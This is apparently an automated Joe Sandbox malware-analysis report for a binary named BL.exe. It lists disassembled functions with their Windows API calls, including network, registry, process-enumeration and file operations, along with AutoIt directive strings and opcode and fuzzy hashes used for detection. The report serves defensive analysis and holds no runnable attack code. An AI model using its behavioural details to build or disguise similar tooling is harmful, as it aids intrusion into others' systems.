                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1291720006-3916222277
                                                                                                                            • Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                                            • Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
                                                                                                                            • Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                                            • Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
                                                                                                                            Function 0046BB59 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 168networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastselect
                                                                                                                            • String ID: HH
                                                                                                                            • API String ID: 215497628-2761332787
                                                                                                                            • Opcode ID: cde8accdca829d9983e03de59e67da7c6bf461f8c0dbfe7f64911849eea10562
                                                                                                                            • Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
                                                                                                                            • Opcode Fuzzy Hash: cde8accdca829d9983e03de59e67da7c6bf461f8c0dbfe7f64911849eea10562
                                                                                                                            • Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
                                                                                                                            Function 0047D2F8 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __snwprintf__wcsicoll_wcscpy
                                                                                                                            • String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                                                                            • API String ID: 1729044348-3708979750
                                                                                                                            • Opcode ID: bcf3ca565e1fb392723d3e06de7fa0d6b980a33582063796cf81a7d85c8f329b
                                                                                                                            • Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
                                                                                                                            • Opcode Fuzzy Hash: bcf3ca565e1fb392723d3e06de7fa0d6b980a33582063796cf81a7d85c8f329b
                                                                                                                            • Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA
                                                                                                                            Function 0044BBC9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100filestringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\BL.exe,?,C:\Users\user\Desktop\BL.exe,004A8E80,C:\Users\user\Desktop\BL.exe,0040F3D2), ref: 0040FFCA
                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BC38
                                                                                                                            • _wcscat.LIBCMT ref: 0044BCAA
                                                                                                                            • _wcslen.LIBCMT ref: 0044BCB7
                                                                                                                            • _wcslen.LIBCMT ref: 0044BCCB
                                                                                                                            • SHFileOperationW.SHELL32 ref: 0044BD16
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                                                            • String ID: \*.*
                                                                                                                            • API String ID: 2326526234-1173974218
                                                                                                                            • Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                                                            • Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
                                                                                                                            • Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                                                            • Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA
                                                                                                                            Function 004366BE Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
                                                                                                                            • _wcslen.LIBCMT ref: 004366DD
                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00436700
                                                                                                                            • GetLastError.KERNEL32 ref: 0043670F
                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
                                                                                                                            • _wcsrchr.LIBCMT ref: 0043674C
                                                                                                                              • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                                            • String ID: \
                                                                                                                            • API String ID: 321622961-2967466578
                                                                                                                            • Opcode ID: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
                                                                                                                            • Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
                                                                                                                            • Opcode Fuzzy Hash: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
                                                                                                                            • Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE
                                                                                                                            Function 0044C80C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __wcsnicmp
                                                                                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                            • API String ID: 1038674560-2734436370
                                                                                                                            • Opcode ID: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
                                                                                                                            • Instruction ID: f72ce1d64a5a3b865947b719243e4701f1ba8c8209579f194a7ae3ad15c73224
                                                                                                                            • Opcode Fuzzy Hash: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
                                                                                                                            • Instruction Fuzzy Hash: 1B21F87261161067E730B659DCC2BDB63985F65305F04406BF800AA247D6ADA98A83AA
                                                                                                                            Function 00436EC8 Relevance: 12.1, APIs: 8, Instructions: 103COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnumProcesses.PSAPI(?,00000800,?,?,00444263,?,?,?), ref: 00436EEC
                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?), ref: 00436F44
                                                                                                                            • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00436F59
                                                                                                                            • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104,00000000,?,00000004,?), ref: 00436F71
                                                                                                                            • __wsplitpath.LIBCMT ref: 00436FA0
                                                                                                                            • _wcscat.LIBCMT ref: 00436FB2
                                                                                                                            • __wcsicoll.LIBCMT ref: 00436FC4
                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,?,00000104,00000000,?,00000004,?), ref: 00437003
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2903788889-0
                                                                                                                            • Opcode ID: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
                                                                                                                            • Instruction ID: e95795bff0e4a6f47310c77509a1ee8dff79588992f1933afd8058d7896a4498
                                                                                                                            • Opcode Fuzzy Hash: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
                                                                                                                            • Instruction Fuzzy Hash: C831A5B5108341ABD725DF54D881EEF73E8BBC8704F00891EF6C587241DBB9AA89C766
                                                                                                                            Function 00441561 Relevance: 12.1, APIs: 8, Instructions: 101windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DeleteObject.GDI32(?), ref: 0044157D
                                                                                                                            • GetDC.USER32(00000000), ref: 00441585
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0044159B
                                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
                                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
                                                                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3864802216-0
                                                                                                                            • Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                                                                            • Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
                                                                                                                            • Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                                                                            • Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64
                                                                                                                            Function 00401230 Relevance: 12.1, APIs: 8, Instructions: 83windowtimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00401257
                                                                                                                              • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
                                                                                                                              • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
                                                                                                                              • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
                                                                                                                              • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                                                            • KillTimer.USER32(?,?), ref: 004012B0
                                                                                                                            • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
                                                                                                                            • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                                                                                                                            • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                                                                                                                            • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1792922140-0
                                                                                                                            • Opcode ID: 91f47cbc1f218a7f09512ea68bd6b482f011e20e77652f43937312b7b91c0350
                                                                                                                            • Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
                                                                                                                            • Opcode Fuzzy Hash: 91f47cbc1f218a7f09512ea68bd6b482f011e20e77652f43937312b7b91c0350
                                                                                                                            • Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB
                                                                                                                            Function 004140DB Relevance: 12.0, APIs: 8, Instructions: 42threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                                                              • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                              • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                              • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                                                              • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                                                              • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                                                                            • ExitThread.KERNEL32 ref: 0041410F
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                                                                            • __freefls@4.LIBCMT ref: 00414135
                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1925773019-0
                                                                                                                            • Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                                                            • Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
                                                                                                                            • Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                                                            • Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C
                                                                                                                            Function 004357AD Relevance: 12.0, APIs: 8, Instructions: 36COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VariantClear.OLEAUT32(00000038), ref: 004357C3
                                                                                                                            • VariantClear.OLEAUT32(00000058), ref: 004357C9
                                                                                                                            • VariantClear.OLEAUT32(00000068), ref: 004357CF
                                                                                                                            • VariantClear.OLEAUT32(00000078), ref: 004357D5
                                                                                                                            • VariantClear.OLEAUT32(00000088), ref: 004357DE
                                                                                                                            • VariantClear.OLEAUT32(00000048), ref: 004357E4
                                                                                                                            • VariantClear.OLEAUT32(00000098), ref: 004357ED
                                                                                                                            • VariantClear.OLEAUT32(000000A8), ref: 004357F6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClearVariant
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1473721057-0
                                                                                                                            • Opcode ID: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                                                                            • Instruction ID: 4669651a97e20320d925a323ac357da1b1419afffb7c9eb93274aad60c959a81
                                                                                                                            • Opcode Fuzzy Hash: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                                                                            • Instruction Fuzzy Hash: BDF03CB6400B446AC235EB79DC40BD7B7E86F89200F018E1DE58783514DA78F588CB64
                                                                                                                            Function 00464A0E Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00464ADE
                                                                                                                              • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                                                            • inet_addr.WSOCK32(?), ref: 00464B1F
                                                                                                                            • gethostbyname.WSOCK32(?), ref: 00464B29
                                                                                                                            • _memset.LIBCMT ref: 00464B92
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00464CDE
                                                                                                                            • WSACleanup.WSOCK32 ref: 00464CE4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424476444-0
                                                                                                                            • Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                                                            • Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
                                                                                                                            • Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                                                            • Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A
                                                                                                                            Function 00440B39 Relevance: 10.8, APIs: 7, Instructions: 261COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00440B7B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MetricsSystem
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4116985748-0
                                                                                                                            • Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                                                            • Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
                                                                                                                            • Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                                                            • Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
                                                                                                                            Function 0046AB70 Relevance: 10.8, APIs: 7, Instructions: 260registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConnectRegistry_wcslen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 535477410-0
                                                                                                                            • Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                                                            • Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
                                                                                                                            • Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
